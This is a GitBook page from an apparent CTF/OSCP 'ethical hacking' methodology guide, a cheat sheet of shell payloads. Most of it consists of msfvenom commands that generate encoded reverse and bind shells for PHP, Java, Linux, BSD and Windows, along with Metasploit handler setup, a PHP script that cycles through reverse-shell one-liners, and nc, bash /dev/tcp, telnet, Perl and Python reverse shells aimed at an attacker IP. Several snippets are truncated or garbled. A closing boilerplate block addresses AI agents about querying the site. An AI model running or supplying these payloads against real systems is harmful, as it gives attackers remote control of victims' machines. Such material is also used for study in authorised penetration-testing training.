> For the complete documentation index, see [llms.txt](https://666isildur.gitbook.io/ethical-hacking/llms.txt). Markdown versions of documentation pages are available by appending `.md` to page URLs; this page is available as [Markdown](https://666isildur.gitbook.io/ethical-hacking/ctf-oscp-methodology/exploitation/shells.md). # Shells ### Metasploit List payloads ``` msfvenom -l ``` #### Handlers ``` use exploit/multi/handler set PAYLOAD set LHOST set LPORT set ExitOnSession false exploit -j -z ``` #### MSFVenom Payloads ``` # PHP reverse shell msfvenom -p php/meterpreter/reverse_tcp LHOST=10.10.10.10 LPORT=4443 -f raw -o shell.php # Java WAR reverse shell msfvenom -p java/shell_reverse_tcp LHOST=10.10.10.10 LPORT=4443 -f war -o shell.war # Linux bind shell msfvenom -p linux/x86/shell_bind_tcp LPORT=4443 -f c -b "\\x00\\x0a\\x0d\\x20" -e x86/shikata_ga_nai # Linux FreeBSD reverse shell msfvenom -p bsd/x64/shell_reverse_tcp LHOST=10.10.10.10 LPORT=4443 -f elf -o shell.elf # Linux C reverse shell msfvenom -p linux/x86/shell_reverse_tcp LHOST=10.10.10.10 LPORT=4443 -e x86/shikata_ga_nai -f c # Windows non staged reverse shell msfvenom -p windows/shell_reverse_tcp LHOST=10.10.10.10 LPORT=4443 -e x86/shikata_ga_nai -f exe -o non_staged.exe # Windows Staged (Meterpreter) reverse shell msfvenom -p windows/meterpreter/reverse_tcp LHOST=10.10.10.10 LPORT=4443 -e x86/shikata_ga_nai -f exe -o meterpreter.exe # Windows Python reverse shell msfvenom -p windows/shell_reverse_tcp LHOST=10.10.10.10 LPORT=4443 EXITFUNC=thread -f python -o shell.py # Windows ASP reverse shell msfvenom -p windows/shell_reverse_tcp LHOST=10.10.10.10 LPORT=4443 -f asp -e x86/shikata_ga_nai -o shell.asp # Windows ASPX reverse shell msfvenom -f aspx -p windows/shell_reverse_tcp LHOST=10.10.10.10 LPORT=4443 -e x86/shikata_ga_nai -o shell.aspx # Windows JavaScript reverse shell with nops msfvenom -p windows/shell_reverse_tcp LHOST=10.10.10.10 LPORT=4443 -f js_le -e generic/none -n 18 # Windows Powershell reverse shell msfvenom -p windows/shell_reverse_tcp LHOST=10.10.10.10 LPORT=4443 -e x86/shikata_ga_nai -i 9 -f psh -o shell.ps1 # Windows reverse shell excluding bad characters msfvenom -p windows/shell_reverse_tcp -a x86 LHOST=10.10.10.10 LPORT=4443 EXITFUNC=thread -f c -b "\\x00\\x04" -e x86/shikata_ga_nai # Windows x64 bit reverse shell msfvenom -p windows/x64/shell_reverse_tcp LHOST=10.10.10.10 LPORT=4443 -f exe -o shell.exe # Windows reverse shell embedded into plink msfvenom -p windows/shell_reverse_tcp LHOST=10.10.10.10 LPORT=4443 -f exe -e x86/shikata_ga_nai -i 9 -x /usr/share/windows-binaries/plink.exe -o shell_reverse_msf_encoded_embedded.exe ``` If connections drops or can not be established, try different ports 80,443,8080... * Best PHP reverse shell: ``` /dev/tcp/'.$ip.'/'.$port.' 0<&1 2>&1', '0<&196;exec 196<>/dev/tcp/'.$ip.'/'.$port.'; /bin/sh <&196 >&196 2>&196', '/usr/bin/nc '.$ip.' '.$port.' -e /bin/bash', 'nc.exe -nv '.$ip.' '.$port.' -e cmd.exe', "/usr/bin/perl -MIO -e '$p=fork;exit,if($p);$c=new IO::Socket::INET(PeerAddr,\\"".$ip.":".$port."\\");STDIN->fdopen($c,r);$~->fdopen($c,w);system$_ while<>;'", 'rm -f /tmp/p; mknod /tmp/p p && telnet '.$ip.' '.$port.' 0/tmp/p', 'perl -e \\'use Socket;$i="'.$ip.'";$p='.$port.';socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};\\'' ); foreach ($reverse_shells as $reverse_shell) { try {echo system($reverse_shell);} catch (Exception $e) {echo $e;} try {shell_exec($reverse_shell);} catch (Exception $e) {echo $e;} try {exec($reverse_shell);} catch (Exception $e) {echo $e;} } system('id'); ?> ``` * Using netcat ``` nc -e /bin/bash ``` * Using bash and TCP sockets ``` /bin/bash -i > /dev/tcp// 0<&1 2>&1 ``` * Using sh and TCP sockets ``` 0<&196;exec 196<>/dev/tcp//; sh <&196 >&196 2>&196 ``` * Using telnet ``` telnet <1st_port> | /bin/bash | telnet <2nd_port> ``` * PHP and sh ``` php -r '$sock=fsockopen("",);exec("/bin/sh -i <&3 >&3 2>&3");' ``` * Perl and sh ``` perl -e 'use Socket;$i="";$p=&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};' ``` * Perl forking: ``` $ perl -MIO -e '$p=fork;exit,if($p);$c=new IO::Socket::INET(PeerAddr,"ip:port");STDIN->fdopen($c,r);$~->fdopen($c,w);system$_ while<>;' ``` * Python ``` python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("",));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);' ``` * Reverse shell with python script: ``` #!/usr/bin/python import socket,subprocess,os s=socket.socket(socket.AF_INET,socket.SOCK_STREAM) s.connect(("IP",port)) os.dup2(s.fileno(),0) os.dup2(s.fileno(),1) os.dup2(s.fileno(),2) p=subprocess.call(["/bin/sh","-i"]) ``` --- # Agent Instructions This documentation is published with GitBook. GitBook is the documentation platform designed so that both humans and AI agents can read, navigate, and reason over technical content effectively. Learn more at gitbook.com. ## Querying This Documentation If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question. Perform an HTTP GET request on the current page URL with the `ask` query parameter: ``` GET https://666isildur.gitbook.io/ethical-hacking/ctf-oscp-methodology/exploitation/shells.md?ask= ``` The question should be specific, self-contained, and written in natural language. The response will contain a direct answer to the question and relevant excerpts and sources from the documentation. Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.